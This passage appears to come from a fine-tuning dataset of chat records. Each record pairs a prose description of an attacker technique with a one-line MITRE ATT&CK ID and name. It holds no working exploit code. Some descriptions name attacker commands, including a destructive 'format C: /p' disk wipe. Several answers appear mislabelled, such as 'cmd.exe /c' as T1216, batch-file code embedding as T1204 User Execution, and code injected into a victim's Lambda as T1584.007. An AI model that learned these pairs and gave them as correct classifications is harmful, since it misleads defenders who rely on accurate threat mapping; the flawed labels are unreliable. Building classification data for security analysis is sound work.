- {
- "role": "assistant",
- "content": "T1546.012 - Event Triggered Execution: Image File Execution Options Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker compresses and encrypts stolen data, then hides it inside the header fields of a standard network packet using steganography."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation: Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary uses a batch file to clear the MOTW ADS from a malicious script, effectively subverting Windows trust controls and allowing silent execution."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor posts a deceptive message on a corporate Slack channel containing a malicious URL that leads to a credential-stealing site."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Phishing: Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor reaches out to a black‑market supplier to purchase the latest firmware binaries of a target's proprietary SCADA system."
- },
- {
- "role": "assistant",
- "content": "T1597.002 - Search Closed Sources: Purchase Technical Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker leverages the \"systeminfo\" utility combined with custom parsing to extract information about attached peripheral hardware."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors harvest authentication tickets from a compromised host and use them to access other systems as the same user."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the cleanup phase, the attacker altered the last written time of the Windows Event Log files to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors created a scheduled task with the description 'Defender Update' that loads a malicious payload."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The exploit drops a DLL that registers a hidden window, allowing it to persist and communicate with a C2 server covertly."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker swaps the original sshd binary with a malicious version but retains the sshd filename, effectively masquerading as the legitimate daemon."
- },
- {
- "role": "assistant",
- "content": "T1036.003 - Masquerading: Rename System Utilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious actor uses the CDN’s URL lookup feature to locate and download leaked backup files."
- },
- {
- "role": "assistant",
- "content": "T1596.004 - Search Open Technical Databases: CDNs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker uninstalls or corrupts the hardware security module (HSM) drivers on a server, disabling hardware encryption capabilities."
- },
- {
- "role": "assistant",
- "content": "T1600.002 - Weaken Encryption: Disable Crypto Hardware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Supply chain adversary exploits a trusted hardware supplier’s software build process to inject a malicious driver into the final product."
- },
- {
- "role": "assistant",
- "content": "T1195.003 - Supply Chain Compromise: Compromise Hardware Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By crafting a transaction that contains a payload and then rolling it back, the malware executes the payload in the context of a trusted Windows service, demonstrating Process Doppelgänging."
- },
- {
- "role": "assistant",
- "content": "T1055.013 - Process Injection: Process Doppelgänging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gaining access to sensitive data through an unsecured cloud storage service"
- },
- {
- "role": "assistant",
- "content": "T1530 - Data from Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker searches public code repositories for the victim’s domain name to find hard‑coded URLs and API endpoints."
- },
- {
- "role": "assistant",
- "content": "T1593 - Search Open Websites/Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised service reads commands from a database entry and executes them, allowing the attacker to run arbitrary commands without direct execution."
- },
- {
- "role": "assistant",
- "content": "T1202 - Indirect Command Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post‑exploitation tool utilized Python to collect and compress log files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Red team operator obtains a cached credential token from a compromised workstation to perform lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware drops a hidden autorun.inf file on USB sticks, causing the payload to run whenever the media is plugged into a Windows machine."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Non‑English description: '攻击者将恶意代码隐藏在图片的像素中,使用隐写技术进行数据传输。'"
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation: Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor first leverages a rogue Wi-Fi access point to deliver a payload, then sets up a secondary encrypted VPN tunnel for ongoing control."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A covert channel is established via port knocking where the attacker pings a series of ports with specific TTL values, and the server, upon detecting the pattern, enables a hidden administrative interface."
- },
- {
- "role": "assistant",
- "content": "T1205.001 - Traffic Signaling: Port Knocking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The cyber‑crime group exploited a misconfigured Confluence permission setting to mass‑download employee handbooks and policies."
- },
- {
- "role": "assistant",
- "content": "T1213.001 - Data from Information Repositories: Confluence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker performs a credential reuse attack by trying leaked email‑password pairs on multiple social media services."
- },
- {
- "role": "assistant",
- "content": "T1586.001 - Compromise Accounts: Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious macro leverages the PowerShell execution policy to run a script that adds the attacker to the local admin group."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using Twitter DMs, the group delivers a crafted PDF that exploits a zero‑day vulnerability when opened by the recipient."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Phishing: Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary employed steganography to hide malicious macros within a seemingly benign Office document's hidden objects."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Obfuscated Files or Information: Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware overwrites the original binary of a financial application with a malicious variant that logs keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Client Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker uses the \"Get-WmiObject Win32_NetworkAdapterConfiguration\" cmdlet to discover which adapters are configured for internet access."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious actor hijacks a legitimate Telnet session to exfiltrate sensitive data from the target system."
- },
- {
- "role": "assistant",
- "content": "T1563 - Remote Service Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using tools like Mimikatz, the attacker pulls Kerberos tickets and reuses them to impersonate the legitimate user."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A network logon script is altered to include a command that disables security tools before loading the malware."
- },
- {
- "role": "assistant",
- "content": "T1037.003 - Boot or Logon Initialization Scripts: Network Logon Script"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised service was configured to call \"cmd.exe /c\" followed by a hidden PowerShell command, leveraging the command interpreter as a script proxy for stealthy execution."
- },
- {
- "role": "assistant",
- "content": "T1216 - System Script Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion leverages process masquerading by altering the process tree so that the rogue process appears as a descendant of a legitimate system component."
- },
- {
- "role": "assistant",
- "content": "T1036.009 - Masquerading: Break Process Trees"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors abuse sc create to set up a service that calls their payload with SYSTEM privileges."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious actor injects harmful code into an AWS Lambda function to harvest credentials from the cloud environment."
- },
- {
- "role": "assistant",
- "content": "T1584.007 - Compromise Infrastructure: Serverless"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious binary inspects the presence of the \"hyperv\" driver and disables its payload if it is detected."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware harvests JWTs stored in configuration files and reuses them to gain unauthorized access to Azure resources."
- },
- {
- "role": "assistant",
- "content": "T1550.001 - Use Alternate Authentication Material: Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary uses compromised AWS credentials to launch a new EC2 instance in the victim's VPC."
- },
- {
- "role": "assistant",
- "content": "T1578.002 - Modify Cloud Compute Infrastructure: Create Cloud Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware creates counterfeit firewall notifications that appear legitimate, causing administrators to ignore real alerts."
- },
- {
- "role": "assistant",
- "content": "T1562.011 - Impair Defenses: Spoof Security Alerting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat group hijacks the Windows Server Update Services (WSUS) to deploy a backdoor under the guise of a legitimate patch."
- },
- {
- "role": "assistant",
- "content": "T1072 - Software Deployment Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group acquires confidential software source code by paying a rogue insider who leaks the files."
- },
- {
- "role": "assistant",
- "content": "T1597.002 - Search Closed Sources: Purchase Technical Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor exploits a buffer overflow in a privileged service to retrieve stored SSH keys from memory."
- },
- {
- "role": "assistant",
- "content": "T1212 - Exploitation for Credential Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using stolen credentials for a cloud-based IT service, the attacker establishes a remote PowerShell session on the victim's servers."
- },
- {
- "role": "assistant",
- "content": "T1021.007 - Remote Services: Cloud Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker overwhelms the target’s network bandwidth by sending a massive stream of UDP packets to random ports, causing a direct network flood."
- },
- {
- "role": "assistant",
- "content": "T1498.001 - Network Denial of Service: Direct Network Flood"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A campaign deploys a launch daemon that suppresses system logs and runs a persistence script each time the user logs in."
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A phishing email tricks users into entering their credentials on a fake login page."
- },
- {
- "role": "assistant",
- "content": "T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder changes the ownership of a privileged account to a controlled account to hijack sessions."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script examines the CPU tick count and only proceeds when the count exceeds a threshold, evading analysis environments."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remote access tool uses a hidden iframe in a compromised web page to pull C2 scripts via GET requests."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - Web Service: One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware drops a PowerShell module that creates a new domain user with elevated rights."
- },
- {
- "role": "assistant",
- "content": "T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder altered the file name of a credential stealer to match \"wuauclt.exe\" to hide in logs."
- },
- {
- "role": "assistant",
- "content": "T1036.003 - Masquerading: Rename System Utilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An advanced persistent threat employs a custom compression algorithm on its command payloads, decompressing them only during execution."
- },
- {
- "role": "assistant",
- "content": "T1027.010 - Obfuscated Files or Information: Command Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Obfuscated commands are constructed by inserting random comments and whitespace to evade signature detection."
- },
- {
- "role": "assistant",
- "content": "T1027.010 - Obfuscated Files or Information: Command Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion involves using regsvcs.exe to instantiate a .NET class from a remote assembly, achieving execution without writing files to disk."
- },
- {
- "role": "assistant",
- "content": "T1218.009 - System Binary Proxy Execution: Regsvcs/Regasm"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors use a credential‑stealing tool that intercepts calls to the Windows Credential Provider (CredUIPromptForCredentials) to harvest passwords entered into login dialogs."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post‑exploitation tool extracts credential blobs from Windows Credential Manager for later reuse on other systems."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious actor leaves a USB stick in a public area of the office; when an employee plugs it in, the malware automatically gathers and writes files to the stick."
- },
- {
- "role": "assistant",
- "content": "T1052.001 - Exfiltration Over Physical Medium: Exfiltration over USB"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware executed a PowerShell script that called InstallUtil to trigger a malicious assembly."
- },
- {
- "role": "assistant",
- "content": "T1218.004 - System Binary Proxy Execution: InstallUtil"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker runs the Windows command 'gpresult /SCOPE COMPUTER /R' to list applied Group Policy Objects on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1615 - Group Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised laptop is taken offsite, and the attacker uses the built‑in USB ports to dump encrypted backups onto a portable SSD."
- },
- {
- "role": "assistant",
- "content": "T1052.001 - Exfiltration Over Physical Medium: Exfiltration over USB"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised system runs a batch file that formats the C: drive with the `/p` switch to wipe data before reboot."
- },
- {
- "role": "assistant",
- "content": "T1561 - Disk Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker hosts a malicious .js file on a compromised forum that triggers a PowerShell payload with a single click."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker discovered that the service’s binary was world‑writable and placed a malicious executable to be executed on system boot."
- },
- {
- "role": "assistant",
- "content": "T1574.010 - Hijack Execution Flow: Services File Permissions Weakness"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion technique involves placing a malicious .chm file on the victim machine and executing it with mshta.exe to bypass application whitelisting."
- },
- {
- "role": "assistant",
- "content": "T1218.001 - System Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A targeted phishing email in German includes a link to a fake tax authority website designed to steal login information."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors executed \"crictl exec\" on a compromised node to spawn a bash process within a container for further exploitation."
- },
- {
- "role": "assistant",
- "content": "T1609 - Container Administration Command"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious actor produces a self‑signed certificate to hide command‑and‑control traffic within HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1587.003 - Develop Capabilities: Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors leverage IFEO injection to achieve privilege escalation by making high‑privilege processes invoke a malicious payload as a debugger."
- },
- {
- "role": "assistant",
- "content": "T1546.012 - Event Triggered Execution: Image File Execution Options Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using Nmap service version detection scripts to identify software versions of discovered services."
- },
- {
- "role": "assistant",
- "content": "T1595 - Active Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors employed Google Cloud's IAP tunneling feature to connect to a victim's Compute Engine VM, establishing a persistent remote service channel."
- },
- {
- "role": "assistant",
- "content": "T1021.008 - Remote Services: Direct Cloud VM Connections"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor employs process injection via TLS by embedding its code in the process's thread-local storage and triggering execution via a remote thread."
- },
- {
- "role": "assistant",
- "content": "T1055.005 - Process Injection: Thread Local Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat group creates a YouTube channel with a name similar to a popular tech reviewer to upload tutorial videos that embed malware via hidden links."
- },
- {
- "role": "assistant",
- "content": "T1585.001 - Establish Accounts: Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware embeds its code within legitimate system scripts (e.g., batch files) and uses conditional execution to hide its behavior."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
